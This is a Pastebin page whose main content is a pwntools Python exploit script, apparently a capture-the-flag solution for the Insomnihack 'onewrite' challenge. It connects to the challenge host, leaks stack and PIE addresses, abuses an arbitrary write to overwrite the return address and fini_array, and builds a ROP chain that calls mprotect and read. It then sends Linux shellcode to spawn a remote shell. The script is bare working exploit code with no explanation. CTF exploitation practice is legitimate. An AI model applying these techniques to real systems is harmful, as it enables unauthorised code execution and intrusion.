API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 20th, 2019
151
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.40 KB | None | 0 0
raw download clone embed print report
  1. from pwn import *
  2. from heaputils import *
  3.  
  4. def write(addr,content):
  5. p.recvuntil("address : ")
  6. p.send(str(addr).ljust(0xF,"\x00"))
  7. p.recvuntil("data : ")
  8. p.send(p64(content))
  9.  
  10. def exploit():
  11. p.recvuntil(">")
  12. p.sendline("1")
  13.  
  14. STACK = int(p.recvline(),16)
  15. retaddr_location = 0x7fffd95e7108 - 0x7fffd95e70f0 + STACK
  16. log.info("STACK: 0x%x"%STACK)
  17. log.info("retaddr is at: 0x%x"%retaddr_location)
  18.  
  19. #partial overwrite
  20. p.recvuntil("address : ")
  21. p.send(str(retaddr_location).ljust(0xF,"\x00"))
  22. p.recvuntil("data : ")
  23. p.send(chr(0x4))
  24.  
  25. #PIE leak
  26. p.recvuntil(">")
  27. p.sendline("2")
  28.  
  29. do_leak = int(p.recvline(),16)
  30. PIE = do_leak + 0x7fedc4b54000 - 0x7fedc4b5ca15
  31. log.info("PIE: 0x%x"%PIE)
  32.  
  33. call_rsi = PIE + 0x1c763
  34. pop_rdi = PIE + 0x84FA
  35. pop_rsi = PIE + 0xD9F2
  36. pop_rdx = PIE + 0x484C5
  37. read = PIE + 0x460F0
  38. mprotect = PIE + 0x47070
  39. do_overwrite = PIE + 0x89C3
  40. fini_list = PIE + 0x2ADFB0
  41. libc_csu_fini = PIE + 0x9810
  42.  
  43. # 0x00000000000563d9 : add rsp, 0x148 ; ret
  44. pivot_gadget= PIE + 0x563d9
  45.  
  46. p.recvuntil("address : ")
  47. p.send(str(retaddr_location).ljust(0xF,"\x00"))
  48. p.recvuntil("data : ")
  49. p.send(p64(do_overwrite))
  50.  
  51. write(fini_list+8,do_overwrite)
  52. write(fini_list,libc_csu_fini)
  53.  
  54. # form a ROP chain: mprotect / shellcode
  55. ropstack = PIE + 0x2B4858
  56. ropstack_stager = STACK - 0x7ffc89d8d120 + 0x7ffc89d8cfa0 + 0x148
  57. retaddr_location = STACK - 0x7ffeaeb3c660 + 0x7ffeaeb3c4d8
  58.  
  59. log.info("ROP Stack Stager: 0x%x"%ropstack_stager)
  60.  
  61.  
  62. write(ropstack_stager,pop_rdi)
  63. write(ropstack_stager+8,0)
  64. write(ropstack_stager+0x10,pop_rsi)
  65. write(ropstack_stager+0x18,ropstack_stager+0x38)
  66. write(ropstack_stager+0x20,pop_rdx)
  67. write(ropstack_stager+0x28,0x1000)
  68. write(ropstack_stager+0x30,read)
  69.  
  70. write(retaddr_location,pivot_gadget)
  71.  
  72. ropchain = p64(pop_rdi)+p64(PIE)
  73. ropchain += p64(pop_rsi)+p64(0x1000)
  74. ropchain += p64(pop_rdx)+p64(7)
  75. ropchain += p64(mprotect)
  76.  
  77. ropchain += p64(pop_rdi)+p64(0)
  78. ropchain += p64(pop_rsi)+p64(PIE)
  79. ropchain += p64(pop_rdx)+p64(0x1000)
  80. ropchain += p64(read)
  81. ropchain += p64(PIE)
  82.  
  83. shellcode_d = shellcraft.amd64.linux.sh()
  84. shellcode = asm(shellcode_d)
  85.  
  86. p.send(ropchain)
  87. sleep(1) #wait for pipe to end
  88. p.send(shellcode)
  89.  
  90. p.interactive()
  91.  
  92. if __name__ == "__main__":
  93.  
  94. context.os = 'linux'
  95. context.arch = 'amd64'
  96.  
  97. e = ELF("./attackme")
  98. p = remote("onewrite.teaser.insomnihack.ch", 1337)
  99.  
  100. exploit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!